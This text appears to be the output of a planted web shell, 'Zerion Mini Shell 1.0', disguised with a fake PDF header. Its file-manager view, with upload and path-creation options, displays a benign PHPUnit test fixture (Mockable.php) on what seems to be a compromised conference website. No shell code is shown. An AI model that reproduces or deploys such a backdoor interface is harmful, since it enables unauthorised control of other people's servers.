%PDF- %PDF-
Mini Shell

Mini Shell

Direktori : /var/www/html/conference/vendor/phpunit/phpunit/tests/_files/
Upload File :
Create Path :
Current File : /var/www/html/conference/vendor/phpunit/phpunit/tests/_files/Mockable.php

<?php
class Mockable
{
    public $constructorCalled = false;
    public $cloned            = false;

    public function __construct()
    {
        $this->constructorCalled = false;
    }

    public function foo()
    {
        return true;
    }

    public function bar()
    {
        return true;
    }

    public function __clone()
    {
        $this->cloned = true;
    }
}

Zerion Mini Shell 1.0